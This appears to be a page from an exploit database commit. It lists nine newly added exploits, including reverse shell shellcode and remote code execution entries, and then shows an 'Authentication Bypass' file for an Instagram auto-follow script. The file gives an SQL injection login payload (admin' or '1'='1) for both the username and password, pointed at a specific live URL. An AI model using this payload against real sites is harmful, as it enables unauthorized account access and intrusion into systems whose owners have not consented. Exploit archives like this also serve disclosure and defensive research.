
9 changes to exploits/shellcodes SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service Windows PowerShell ISE - Remote Code Execution Blue Angel Software Suite - Command Execution Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection Instagram Auto Follow - Authentication Bypass Zotonic < 0.47.0 mod_admin - Cross-Site Scripting Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)
12 lines
No EOL
367 B
Text
12 lines
No EOL
367 B
Text
# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass
|
|
# Date: 2019-05-01
|
|
# Exploit Author: Veyselxan
|
|
# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4
|
|
|
|
# Tested on: Linux
|
|
https://eowynlab.cf/autobot-follow/index.php
|
|
|
|
|
|
username: admin' or '1'='1
|
|
|
|
Password: admin' or '1'='1 |